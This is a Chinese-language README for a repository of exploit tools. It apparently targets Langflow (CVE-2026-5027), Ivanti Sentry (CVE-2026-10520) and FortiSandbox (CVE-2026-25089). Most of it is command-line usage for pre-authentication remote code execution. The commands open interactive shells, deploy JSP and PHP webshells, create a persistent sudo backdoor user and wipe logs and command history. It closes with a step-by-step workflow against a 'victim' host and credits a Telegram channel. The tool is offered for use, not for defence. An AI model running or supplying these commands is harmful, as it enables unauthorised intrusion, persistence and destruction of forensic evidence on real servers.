Layer-6/CVE-2026-5027-Langflow

# (CVE-2026-5027) 和 (CVE-2026-10520) (CVE-2026-25089) 利用工具： ## 克隆 ``` git clone https://github.com/Layer-6/CVE-2026-5027-Langflow.git cd CVE-2026-5027-Langflow ``` # (exploit.py) 文件用法 # 自动化测试与漏洞利用。 ``` python3 exploit.py -u https://target.com ``` ## CLI 自定义设置 ## 当 shell 位于某个文件夹内时，使用你自己的 webshell： ``` python3 exploit.py -u https://target.com --shell ``` (📁shells/my-shell.php) # 当 shell 位于工具文件夹内或直接在终端目录下（无文件夹）时： ``` python3 exploit.py -u https://target.com --shell my-shell.php ``` # 你的 webshell 可以是 (PHP, Python (CGI), Perl, Ruby, ASPX)。 # 你可以使用 --t 设置超时时间，并使用 --p 从文件夹和文件中加载/使用 payload 或自定义路径： ``` python3 exploit.py -u https://target.com | -t 58 | |-p payloads.txt | | --upload-paths Dirs.txt | ``` ## 示例： ``` python3 exploit.py -u https://target.com --shell shells/myshell.php -t 58 -p payloads.txt --upload-paths dirs.txt ``` ## (exploitt.py) 文件用法 # 专为以下 CVE 设计： # · CVE-2026-10520 (CVSS 10.0) · CVE-2026-25089 (CVSS 9.1) ## 预认证远程代码执行 (RCE) 无需凭证。 # 📖 用法 # 快速开始 - 交互式菜单（无参数） ``` python3 exploitt.py ``` # 然后按照提示操作： # 1. 选择目标类型 (Ivanti 或 Forti) 2. 输入目标 URL (例如 https://192.168.1.100:8443) 3. 设置超时时间、代理、调试模式 4. 选择操作 (command, shell, webshell 等) # 命令行（高级） # 1. Ivanti Sentry (CVE-2026-10520) ``` # 检查是否存在漏洞 python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -c "id" # 交互式 shell python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -s # 部署 JSP webshell (Tomcat) python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -w # 创建后门用户 + 清理日志 python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -p --clean ``` 2. FortiSandbox (CVE-2026-25089) ``` # 单条命令 python3 exploitt.py -u https://forti.example.com --type forti -c "whoami" # 带文件上传的交互式 shell python3 exploitt.py -u https://forti.example.com --type forti -s # 在 shell 内：上传 /path/local.txt /remote/path.txt # 部署 PHP webshell python3 exploitt.py -u https://forti.example.com --type forti -w # 全自动 pwn（检查、shell、webshell、权限维持、清理） python3 exploitt.py -u https://forti.example.com --type forti -s -w -p --clean ``` 3. 自动检测（脚本自动猜测服务） ``` python3 exploitt.py -u https://target.example.com -c "id" ``` 4. 使用代理与调试 ``` python3 exploitt.py -u https://target:8443 --proxy http://127.0.0.1:8080 --debug -c "uname -a" ``` 可用的命令行参数 参数 描述 -u, --url 目标 URL (例如 https://192.168.1.100:8443) --type 强制指定服务：ivanti 或 forti (可选，默认自动检测) -t, --timeout 请求超时时间，单位为秒 (默认 30) --proxy HTTP/HTTPS 代理 (例如 http://127.0.0.1:8080) -d, --debug 启用调试输出 --ua 自定义 User‑Agent 字符串 -c, --cmd 执行单条命令并退出 -s, --shell 启动交互式 shell -w, --webshell 部署 webshell (Forti 使用 PHP，Ivanti 使用 JSP) -p, --persist 创建具有 sudo 权限的持久化后门用户 --clean 利用完成后清除日志和命令历史记录 交互式 shell 命令 在交互式 shell 中，你可以使用： 命令 示例 描述 普通命令 id 执行任意系统命令 upload upload exploit.sh /tmp/backdoor.sh 上传本地文件到远程主机 exit exit 退出 shell Webshell 部署详情 · Ivanti Sentry – 在 Tomcat webapps 目录 (/usr/local/tomcat/webapps/ROOT/) 内部署 .jsp shell · 访问方式 https://target/shell_random.jsp?cmd=whoami · FortiSandbox – 在 Web 根目录 (/var/www/html/) 内部署 .php shell · 访问方式 https://target/shell_random.php?cmd=whoami 示例工作流（完整渗透测试） ``` # 1. 检测并利用 python3 exploitt.py -u https://victim.com:8443 --type ivanti -s # 2. 在 shell 内，检查权限 id # 3. 部署 webshell 进行权限维持 python3 exploitt.py -u https://victim.com:8443 --type ivanti -w # 4. 创建后门用户 python3 exploitt.py -u https://victim.com:8443 --type ivanti -p # 5. 清理日志 python3 exploitt.py -u https://victim.com:8443 --type ivanti --clean ``` # 由 Red Telegram 频道提供： https://t.me/Red_Rooted_Ghost

标签：Python, 安全, 文档结构分析, 无后门, 编程工具, 超时处理, 远程代码执行, 逆向工具